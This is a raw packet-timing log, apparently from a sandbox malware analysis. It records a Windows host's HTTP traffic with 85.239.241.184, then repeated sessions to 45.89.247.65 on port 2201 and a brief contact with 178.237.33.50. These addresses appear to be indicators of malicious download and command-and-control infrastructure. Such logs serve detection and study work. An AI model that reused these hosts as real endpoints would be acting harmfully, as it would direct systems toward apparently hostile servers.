                          Sep 6, 2024 11:26:05.491208076 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.491223097 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.491233110 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.491236925 CEST4916380192.168.2.2285.239.241.184
                          Sep 6, 2024 11:26:05.491242886 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.491254091 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.491261959 CEST4916380192.168.2.2285.239.241.184
                          Sep 6, 2024 11:26:05.491264105 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.491274118 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.491283894 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.491296053 CEST4916380192.168.2.2285.239.241.184
                          Sep 6, 2024 11:26:05.491296053 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.491307020 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.491314888 CEST4916380192.168.2.2285.239.241.184
                          Sep 6, 2024 11:26:05.491343021 CEST4916380192.168.2.2285.239.241.184
                          Sep 6, 2024 11:26:05.491489887 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.491499901 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.491509914 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.491527081 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.491532087 CEST4916380192.168.2.2285.239.241.184
                          Sep 6, 2024 11:26:05.491539001 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.491549015 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.491560936 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.491569996 CEST4916380192.168.2.2285.239.241.184
                          Sep 6, 2024 11:26:05.491597891 CEST4916380192.168.2.2285.239.241.184
                          Sep 6, 2024 11:26:05.491656065 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.491666079 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.491674900 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.491686106 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.491693974 CEST4916380192.168.2.2285.239.241.184
                          Sep 6, 2024 11:26:05.491697073 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.491707087 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.491717100 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.491723061 CEST4916380192.168.2.2285.239.241.184
                          Sep 6, 2024 11:26:05.491728067 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.491739988 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.491750956 CEST4916380192.168.2.2285.239.241.184
                          Sep 6, 2024 11:26:05.491754055 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.491791964 CEST4916380192.168.2.2285.239.241.184
                          Sep 6, 2024 11:26:05.491980076 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.492034912 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.492047071 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.492055893 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.492074966 CEST4916380192.168.2.2285.239.241.184
                          Sep 6, 2024 11:26:05.492197990 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.492208004 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.492223024 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.492233038 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.492238045 CEST4916380192.168.2.2285.239.241.184
                          Sep 6, 2024 11:26:05.492243052 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.492252111 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.492263079 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.492265940 CEST4916380192.168.2.2285.239.241.184
                          Sep 6, 2024 11:26:05.492273092 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.492275953 CEST4916380192.168.2.2285.239.241.184
                          Sep 6, 2024 11:26:05.492284060 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.492292881 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.492304087 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.492306948 CEST4916380192.168.2.2285.239.241.184
                          Sep 6, 2024 11:26:05.492315054 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.492326975 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.492340088 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.492340088 CEST4916380192.168.2.2285.239.241.184
                          Sep 6, 2024 11:26:05.492393017 CEST4916380192.168.2.2285.239.241.184
                          Sep 6, 2024 11:26:05.576374054 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.576392889 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.576404095 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.576414108 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.576425076 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.576427937 CEST4916380192.168.2.2285.239.241.184
                          Sep 6, 2024 11:26:05.576436043 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.576441050 CEST4916380192.168.2.2285.239.241.184
                          Sep 6, 2024 11:26:05.576451063 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.576473951 CEST4916380192.168.2.2285.239.241.184
                          Sep 6, 2024 11:26:05.576513052 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.576522112 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.576530933 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.576548100 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.576555967 CEST4916380192.168.2.2285.239.241.184
                          Sep 6, 2024 11:26:05.576558113 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.576567888 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.576579094 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.576581001 CEST4916380192.168.2.2285.239.241.184
                          Sep 6, 2024 11:26:05.576590061 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.576598883 CEST4916380192.168.2.2285.239.241.184
                          Sep 6, 2024 11:26:05.576616049 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.576616049 CEST4916380192.168.2.2285.239.241.184
                          Sep 6, 2024 11:26:05.576630116 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.576639891 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.576664925 CEST4916380192.168.2.2285.239.241.184
                          Sep 6, 2024 11:26:05.576689005 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.576699018 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.576709032 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.576719999 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.576725006 CEST4916380192.168.2.2285.239.241.184
                          Sep 6, 2024 11:26:05.576734066 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.576745987 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.576755047 CEST4916380192.168.2.2285.239.241.184
                          Sep 6, 2024 11:26:05.576756001 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.576766968 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.576772928 CEST4916380192.168.2.2285.239.241.184
                          Sep 6, 2024 11:26:05.576797009 CEST4916380192.168.2.2285.239.241.184
                          Sep 6, 2024 11:26:05.576970100 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.576980114 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.576988935 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.576997995 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.577009916 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.577018023 CEST4916380192.168.2.2285.239.241.184
                          Sep 6, 2024 11:26:05.577020884 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.577032089 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.577042103 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.577047110 CEST4916380192.168.2.2285.239.241.184
                          Sep 6, 2024 11:26:05.577053070 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.577064037 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.577073097 CEST4916380192.168.2.2285.239.241.184
                          Sep 6, 2024 11:26:05.577079058 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.577096939 CEST4916380192.168.2.2285.239.241.184
                          Sep 6, 2024 11:26:05.577102900 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.577112913 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.577121973 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.577140093 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.577141047 CEST4916380192.168.2.2285.239.241.184
                          Sep 6, 2024 11:26:05.577151060 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.577162027 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.577182055 CEST4916380192.168.2.2285.239.241.184
                          Sep 6, 2024 11:26:05.577236891 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.577246904 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.577256918 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.577271938 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.577275991 CEST4916380192.168.2.2285.239.241.184
                          Sep 6, 2024 11:26:05.577285051 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.577307940 CEST4916380192.168.2.2285.239.241.184
                          Sep 6, 2024 11:26:05.577392101 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.577402115 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.577410936 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.577425957 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.577431917 CEST4916380192.168.2.2285.239.241.184
                          Sep 6, 2024 11:26:05.577436924 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.577456951 CEST4916380192.168.2.2285.239.241.184
                          Sep 6, 2024 11:26:05.577476978 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.577488899 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.577497959 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.577508926 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.577519894 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.577519894 CEST4916380192.168.2.2285.239.241.184
                          Sep 6, 2024 11:26:05.577529907 CEST4916380192.168.2.2285.239.241.184
                          Sep 6, 2024 11:26:05.654774904 CEST4916380192.168.2.2285.239.241.184
                          Sep 6, 2024 11:26:07.842102051 CEST491642201192.168.2.2245.89.247.65
                          Sep 6, 2024 11:26:07.850265980 CEST22014916445.89.247.65192.168.2.22
                          Sep 6, 2024 11:26:07.850349903 CEST491642201192.168.2.2245.89.247.65
                          Sep 6, 2024 11:26:07.860825062 CEST491642201192.168.2.2245.89.247.65
                          Sep 6, 2024 11:26:07.865605116 CEST22014916445.89.247.65192.168.2.22
                          Sep 6, 2024 11:26:08.456195116 CEST22014916445.89.247.65192.168.2.22
                          Sep 6, 2024 11:26:08.593899965 CEST22014916445.89.247.65192.168.2.22
                          Sep 6, 2024 11:26:08.593961954 CEST491642201192.168.2.2245.89.247.65
                          Sep 6, 2024 11:26:08.597789049 CEST491642201192.168.2.2245.89.247.65
                          Sep 6, 2024 11:26:08.602538109 CEST22014916445.89.247.65192.168.2.22
                          Sep 6, 2024 11:26:08.602590084 CEST491642201192.168.2.2245.89.247.65
                          Sep 6, 2024 11:26:08.607362032 CEST22014916445.89.247.65192.168.2.22
                          Sep 6, 2024 11:26:09.217880011 CEST22014916445.89.247.65192.168.2.22
                          Sep 6, 2024 11:26:09.219383955 CEST491642201192.168.2.2245.89.247.65
                          Sep 6, 2024 11:26:09.224262953 CEST22014916445.89.247.65192.168.2.22
                          Sep 6, 2024 11:26:09.276911020 CEST22014916445.89.247.65192.168.2.22
                          Sep 6, 2024 11:26:09.280447960 CEST491652201192.168.2.2245.89.247.65
                          Sep 6, 2024 11:26:09.285279036 CEST22014916545.89.247.65192.168.2.22
                          Sep 6, 2024 11:26:09.285339117 CEST491652201192.168.2.2245.89.247.65
                          Sep 6, 2024 11:26:09.289150953 CEST491652201192.168.2.2245.89.247.65
                          Sep 6, 2024 11:26:09.293996096 CEST22014916545.89.247.65192.168.2.22
                          Sep 6, 2024 11:26:09.336769104 CEST4916680192.168.2.22178.237.33.50
                          Sep 6, 2024 11:26:09.341624975 CEST8049166178.237.33.50192.168.2.22
                          Sep 6, 2024 11:26:09.341676950 CEST4916680192.168.2.22178.237.33.50
                          Sep 6, 2024 11:26:09.341891050 CEST4916680192.168.2.22178.237.33.50
                          Sep 6, 2024 11:26:09.346631050 CEST8049166178.237.33.50192.168.2.22
                          Sep 6, 2024 11:26:09.489871979 CEST491642201192.168.2.2245.89.247.65
                          Sep 6, 2024 11:26:09.937393904 CEST22014916545.89.247.65192.168.2.22
                          Sep 6, 2024 11:26:09.960402012 CEST8049166178.237.33.50192.168.2.22
                          Sep 6, 2024 11:26:09.960511923 CEST4916680192.168.2.22178.237.33.50
                          Sep 6, 2024 11:26:09.968861103 CEST491642201192.168.2.2245.89.247.65
                          Sep 6, 2024 11:26:09.973694086 CEST22014916445.89.247.65192.168.2.22
                          Sep 6, 2024 11:26:10.069514990 CEST22014916545.89.247.65192.168.2.22
                          Sep 6, 2024 11:26:10.069561005 CEST491652201192.168.2.2245.89.247.65
                          Sep 6, 2024 11:26:10.073977947 CEST491652201192.168.2.2245.89.247.65
                          Sep 6, 2024 11:26:10.078820944 CEST22014916545.89.247.65192.168.2.22
                          Sep 6, 2024 11:26:10.078872919 CEST491652201192.168.2.2245.89.247.65
                          Sep 6, 2024 11:26:10.083625078 CEST22014916545.89.247.65192.168.2.22
                          Sep 6, 2024 11:26:10.393261909 CEST22014916545.89.247.65192.168.2.22
                          Sep 6, 2024 11:26:10.393342972 CEST22014916545.89.247.65192.168.2.22
                          Sep 6, 2024 11:26:10.393353939 CEST22014916545.89.247.65192.168.2.22
                          Sep 6, 2024 11:26:10.393364906 CEST22014916545.89.247.65192.168.2.22
                          Sep 6, 2024 11:26:10.393376112 CEST22014916545.89.247.65192.168.2.22
                          Sep 6, 2024 11:26:10.393381119 CEST491652201192.168.2.2245.89.247.65
                          Sep 6, 2024 11:26:10.393388033 CEST22014916545.89.247.65192.168.2.22
                          Sep 6, 2024 11:26:10.393400908 CEST22014916545.89.247.65192.168.2.22
                          Sep 6, 2024 11:26:10.393400908 CEST491652201192.168.2.2245.89.247.65
                          Sep 6, 2024 11:26:10.393414021 CEST22014916545.89.247.65192.168.2.22
                          Sep 6, 2024 11:26:10.393424988 CEST491652201192.168.2.2245.89.247.65
                          Sep 6, 2024 11:26:10.393424988 CEST22014916545.89.247.65192.168.2.22
                          Sep 6, 2024 11:26:10.393440008 CEST22014916545.89.247.65192.168.2.22
                          Sep 6, 2024 11:26:10.393444061 CEST491652201192.168.2.2245.89.247.65
                          Sep 6, 2024 11:26:10.393474102 CEST491652201192.168.2.2245.89.247.65
                          Sep 6, 2024 11:26:10.393497944 CEST491652201192.168.2.2245.89.247.65
                          Sep 6, 2024 11:26:10.393933058 CEST22014916545.89.247.65192.168.2.22
                          Sep 6, 2024 11:26:10.394249916 CEST22014916545.89.247.65192.168.2.22
                          Sep 6, 2024 11:26:10.394290924 CEST491652201192.168.2.2245.89.247.65
                          Sep 6, 2024 11:26:10.398308039 CEST22014916545.89.247.65192.168.2.22
                          Sep 6, 2024 11:26:10.484111071 CEST22014916545.89.247.65192.168.2.22
                          Sep 6, 2024 11:26:10.484127998 CEST22014916545.89.247.65192.168.2.22
                          Sep 6, 2024 11:26:10.484138012 CEST22014916545.89.247.65192.168.2.22
                          Sep 6, 2024 11:26:10.484148979 CEST22014916545.89.247.65192.168.2.22
                          Sep 6, 2024 11:26:10.484165907 CEST22014916545.89.247.65192.168.2.22
                          Sep 6, 2024 11:26:10.484183073 CEST491652201192.168.2.2245.89.247.65
                          Sep 6, 2024 11:26:10.484198093 CEST491652201192.168.2.2245.89.247.65
                          Sep 6, 2024 11:26:10.484499931 CEST22014916545.89.247.65192.168.2.22
                          Sep 6, 2024 11:26:10.484515905 CEST22014916545.89.247.65192.168.2.22
                          Sep 6, 2024 11:26:10.484528065 CEST22014916545.89.247.65192.168.2.22
                          Sep 6, 2024 11:26:10.484538078 CEST22014916545.89.247.65192.168.2.22
                          Sep 6, 2024 11:26:10.484544039 CEST491652201192.168.2.2245.89.247.65
                          Sep 6, 2024 11:26:10.484551907 CEST22014916545.89.247.65192.168.2.22
                          Sep 6, 2024 11:26:10.484554052 CEST491652201192.168.2.2245.89.247.65
                          Sep 6, 2024 11:26:10.484591961 CEST491652201192.168.2.2245.89.247.65
                          Sep 6, 2024 11:26:10.485384941 CEST22014916545.89.247.65192.168.2.22
                          Sep 6, 2024 11:26:10.485397100 CEST22014916545.89.247.65192.168.2.22
                          Sep 6, 2024 11:26:10.485407114 CEST22014916545.89.247.65192.168.2.22
                          Sep 6, 2024 11:26:10.485416889 CEST22014916545.89.247.65192.168.2.22
                          Sep 6, 2024 11:26:10.485424042 CEST491652201192.168.2.2245.89.247.65
                          Sep 6, 2024 11:26:10.485430002 CEST22014916545.89.247.65192.168.2.22
                          Sep 6, 2024 11:26:10.485450983 CEST491652201192.168.2.2245.89.247.65
                          Sep 6, 2024 11:26:10.486188889 CEST22014916545.89.247.65192.168.2.22
                          Sep 6, 2024 11:26:10.486200094 CEST22014916545.89.247.65192.168.2.22
                          Sep 6, 2024 11:26:10.486216068 CEST22014916545.89.247.65192.168.2.22
                          Sep 6, 2024 11:26:10.486227036 CEST491652201192.168.2.2245.89.247.65
                          Sep 6, 2024 11:26:10.486227989 CEST22014916545.89.247.65192.168.2.22
                          Sep 6, 2024 11:26:10.486241102 CEST22014916545.89.247.65192.168.2.22
                          Sep 6, 2024 11:26:10.486248016 CEST491652201192.168.2.2245.89.247.65
                          Sep 6, 2024 11:26:10.486278057 CEST491652201192.168.2.2245.89.247.65
                          Sep 6, 2024 11:26:10.486584902 CEST491652201192.168.2.2245.89.247.65
                          Sep 6, 2024 11:26:10.489000082 CEST22014916545.89.247.65192.168.2.22
                          Sep 6, 2024 11:26:10.489104033 CEST22014916545.89.247.65192.168.2.22
                          Sep 6, 2024 11:26:10.489146948 CEST491652201192.168.2.2245.89.247.65
                          Sep 6, 2024 11:26:10.557432890 CEST22014916545.89.247.65192.168.2.22
                          Sep 6, 2024 11:26:10.557446003 CEST22014916545.89.247.65192.168.2.22
                          Sep 6, 2024 11:26:10.557456017 CEST22014916545.89.247.65192.168.2.22
                          Sep 6, 2024 11:26:10.557499886 CEST491652201192.168.2.2245.89.247.65
                          Sep 6, 2024 11:26:10.575119019 CEST22014916545.89.247.65192.168.2.22
                          Sep 6, 2024 11:26:10.575130939 CEST22014916545.89.247.65192.168.2.22
                          Sep 6, 2024 11:26:10.575139999 CEST22014916545.89.247.65192.168.2.22
                          Sep 6, 2024 11:26:10.575149059 CEST22014916545.89.247.65192.168.2.22
                          Sep 6, 2024 11:26:10.575161934 CEST22014916545.89.247.65192.168.2.22
                          Sep 6, 2024 11:26:10.575176954 CEST491652201192.168.2.2245.89.247.65
                          Sep 6, 2024 11:26:10.575191021 CEST491652201192.168.2.2245.89.247.65
                          Sep 6, 2024 11:26:10.575397015 CEST22014916545.89.247.65192.168.2.22
                          Sep 6, 2024 11:26:10.575407028 CEST22014916545.89.247.65192.168.2.22
                          Sep 6, 2024 11:26:10.575417042 CEST22014916545.89.247.65192.168.2.22
                          Sep 6, 2024 11:26:10.575437069 CEST491652201192.168.2.2245.89.247.65
                          Sep 6, 2024 11:26:10.575575113 CEST22014916545.89.247.65192.168.2.22
                          Sep 6, 2024 11:26:10.575586081 CEST22014916545.89.247.65192.168.2.22
                          Sep 6, 2024 11:26:10.575609922 CEST491652201192.168.2.2245.89.247.65
                          Sep 6, 2024 11:26:10.575753927 CEST22014916545.89.247.65192.168.2.22
                          Sep 6, 2024 11:26:10.575764894 CEST22014916545.89.247.65192.168.2.22
                          Sep 6, 2024 11:26:10.575789928 CEST491652201192.168.2.2245.89.247.65
                          Sep 6, 2024 11:26:10.575936079 CEST22014916545.89.247.65192.168.2.22
                          Sep 6, 2024 11:26:10.575946093 CEST22014916545.89.247.65192.168.2.22
                          Sep 6, 2024 11:26:10.575958967 CEST22014916545.89.247.65192.168.2.22
                          Sep 6, 2024 11:26:10.575969934 CEST22014916545.89.247.65192.168.2.22
                          Sep 6, 2024 11:26:10.575979948 CEST491652201192.168.2.2245.89.247.65
                          Sep 6, 2024 11:26:10.576004028 CEST491652201192.168.2.2245.89.247.65
                          Sep 6, 2024 11:26:10.576507092 CEST22014916545.89.247.65192.168.2.22
                          Sep 6, 2024 11:26:10.576517105 CEST22014916545.89.247.65192.168.2.22
                          Sep 6, 2024 11:26:10.576527119 CEST22014916545.89.247.65192.168.2.22
                          Sep 6, 2024 11:26:10.576538086 CEST22014916545.89.247.65192.168.2.22
                          Sep 6, 2024 11:26:10.576549053 CEST22014916545.89.247.65192.168.2.22
                          Sep 6, 2024 11:26:10.576551914 CEST491652201192.168.2.2245.89.247.65
                          Sep 6, 2024 11:26:10.576560020 CEST22014916545.89.247.65192.168.2.22
                          Sep 6, 2024 11:26:10.576567888 CEST491652201192.168.2.2245.89.247.65
                          Sep 6, 2024 11:26:10.576572895 CEST22014916545.89.247.65192.168.2.22
                          Sep 6, 2024 11:26:10.576581955 CEST22014916545.89.247.65192.168.2.22
                          Sep 6, 2024 11:26:10.576598883 CEST491652201192.168.2.2245.89.247.65
                          Sep 6, 2024 11:26:10.576622963 CEST491652201192.168.2.2245.89.247.65
                          Sep 6, 2024 11:26:10.577156067 CEST22014916545.89.247.65192.168.2.22
                          Sep 6, 2024 11:26:10.577167988 CEST22014916545.89.247.65192.168.2.22
                          Sep 6, 2024 11:26:10.577178001 CEST22014916545.89.247.65192.168.2.22
                          Sep 6, 2024 11:26:10.577193022 CEST491652201192.168.2.2245.89.247.65
                          Sep 6, 2024 11:26:10.577330112 CEST22014916545.89.247.65192.168.2.22
                          Sep 6, 2024 11:26:10.577341080 CEST22014916545.89.247.65192.168.2.22
                          Sep 6, 2024 11:26:10.577352047 CEST22014916545.89.247.65192.168.2.22
                          Sep 6, 2024 11:26:10.577353001 CEST491652201192.168.2.2245.89.247.65
                          Sep 6, 2024 11:26:10.577370882 CEST491652201192.168.2.2245.89.247.65
                          Sep 6, 2024 11:26:10.579435110 CEST491652201192.168.2.2245.89.247.65
                          Sep 6, 2024 11:26:10.635745049 CEST22014916545.89.247.65192.168.2.22
                          Sep 6, 2024 11:26:10.635781050 CEST22014916545.89.247.65192.168.2.22
                          Sep 6, 2024 11:26:10.635792017 CEST22014916545.89.247.65192.168.2.22
                          Sep 6, 2024 11:26:10.635802984 CEST22014916545.89.247.65192.168.2.22
                          Sep 6, 2024 11:26:10.635824919 CEST22014916545.89.247.65192.168.2.22
                          Sep 6, 2024 11:26:10.635835886 CEST22014916545.89.247.65192.168.2.22
                          Sep 6, 2024 11:26:10.635843992 CEST491652201192.168.2.2245.89.247.65
                          Sep 6, 2024 11:26:10.635847092 CEST22014916545.89.247.65192.168.2.22
                          Sep 6, 2024 11:26:10.635858059 CEST22014916545.89.247.65192.168.2.22
                          Sep 6, 2024 11:26:10.635863066 CEST491652201192.168.2.2245.89.247.65
                          Sep 6, 2024 11:26:10.635883093 CEST491652201192.168.2.2245.89.247.65
                          Sep 6, 2024 11:26:10.635895967 CEST22014916545.89.247.65192.168.2.22
                          Sep 6, 2024 11:26:10.635907888 CEST22014916545.89.247.65192.168.2.22
                          Sep 6, 2024 11:26:10.635931015 CEST491652201192.168.2.2245.89.247.65
                          Sep 6, 2024 11:26:10.647977114 CEST22014916545.89.247.65192.168.2.22
                          Sep 6, 2024 11:26:10.647990942 CEST22014916545.89.247.65192.168.2.22
                          Sep 6, 2024 11:26:10.648006916 CEST22014916545.89.247.65192.168.2.22
                          Sep 6, 2024 11:26:10.648019075 CEST22014916545.89.247.65192.168.2.22
                          Sep 6, 2024 11:26:10.648029089 CEST22014916545.89.247.65192.168.2.22
                          Sep 6, 2024 11:26:10.648027897 CEST491652201192.168.2.2245.89.247.65
                          Sep 6, 2024 11:26:10.648067951 CEST491652201192.168.2.2245.89.247.65
                          Sep 6, 2024 11:26:10.648077011 CEST22014916545.89.247.65192.168.2.22
                          Sep 6, 2024 11:26:10.665867090 CEST22014916545.89.247.65192.168.2.22
                          Sep 6, 2024 11:26:10.665896893 CEST22014916545.89.247.65192.168.2.22
                          Sep 6, 2024 11:26:10.665939093 CEST491652201192.168.2.2245.89.247.65
                          Sep 6, 2024 11:26:10.665951014 CEST22014916545.89.247.65192.168.2.22
                          Sep 6, 2024 11:26:10.665961027 CEST22014916545.89.247.65192.168.2.22
                          Sep 6, 2024 11:26:10.665987968 CEST491652201192.168.2.2245.89.247.65
                          Sep 6, 2024 11:26:10.666014910 CEST22014916545.89.247.65192.168.2.22
                          Sep 6, 2024 11:26:10.666029930 CEST22014916545.89.247.65192.168.2.22
                          Sep 6, 2024 11:26:10.666039944 CEST22014916545.89.247.65192.168.2.22
                          Sep 6, 2024 11:26:10.666050911 CEST22014916545.89.247.65192.168.2.22
                          Sep 6, 2024 11:26:10.666059017 CEST22014916545.89.247.65192.168.2.22
                          Sep 6, 2024 11:26:10.666064024 CEST491652201192.168.2.2245.89.247.65
                          Sep 6, 2024 11:26:10.666069984 CEST22014916545.89.247.65192.168.2.22
                          Sep 6, 2024 11:26:10.666073084 CEST491652201192.168.2.2245.89.247.65
                          Sep 6, 2024 11:26:10.666080952 CEST22014916545.89.247.65192.168.2.22
                          Sep 6, 2024 11:26:10.666102886 CEST491652201192.168.2.2245.89.247.65
                          Sep 6, 2024 11:26:10.666331053 CEST22014916545.89.247.65192.168.2.22
                          Sep 6, 2024 11:26:10.666341066 CEST22014916545.89.247.65192.168.2.22
                          Sep 6, 2024 11:26:10.666351080 CEST22014916545.89.247.65192.168.2.22
                          Sep 6, 2024 11:26:10.666358948 CEST491652201192.168.2.2245.89.247.65
                          Sep 6, 2024 11:26:10.666388035 CEST491652201192.168.2.2245.89.247.65
                          Sep 6, 2024 11:26:10.666455984 CEST22014916545.89.247.65192.168.2.22
                          Sep 6, 2024 11:26:10.666465998 CEST22014916545.89.247.65192.168.2.22
                          Sep 6, 2024 11:26:10.666475058 CEST22014916545.89.247.65192.168.2.22
                          Sep 6, 2024 11:26:10.666484118 CEST22014916545.89.247.65192.168.2.22
                          Sep 6, 2024 11:26:10.666492939 CEST22014916545.89.247.65192.168.2.22
                          Sep 6, 2024 11:26:10.666492939 CEST491652201192.168.2.2245.89.247.65
                          Sep 6, 2024 11:26:10.666505098 CEST22014916545.89.247.65192.168.2.22
                          Sep 6, 2024 11:26:10.666512966 CEST491652201192.168.2.2245.89.247.65
                          Sep 6, 2024 11:26:10.666515112 CEST22014916545.89.247.65192.168.2.22
                          Sep 6, 2024 11:26:10.666526079 CEST22014916545.89.247.65192.168.2.22
                          Sep 6, 2024 11:26:10.666538954 CEST491652201192.168.2.2245.89.247.65
                          Sep 6, 2024 11:26:10.666558027 CEST491652201192.168.2.2245.89.247.65
                          Sep 6, 2024 11:26:10.667279005 CEST22014916545.89.247.65192.168.2.22
                          Sep 6, 2024 11:26:10.667329073 CEST22014916545.89.247.65192.168.2.22
                          Sep 6, 2024 11:26:10.667340040 CEST22014916545.89.247.65192.168.2.22
                          Sep 6, 2024 11:26:10.667363882 CEST491652201192.168.2.2245.89.247.65
                          Sep 6, 2024 11:26:10.667382002 CEST22014916545.89.247.65192.168.2.22
                          Sep 6, 2024 11:26:10.667392015 CEST22014916545.89.247.65192.168.2.22
                          Sep 6, 2024 11:26:10.667399883 CEST22014916545.89.247.65192.168.2.22
                          Sep 6, 2024 11:26:10.667414904 CEST22014916545.89.247.65192.168.2.22
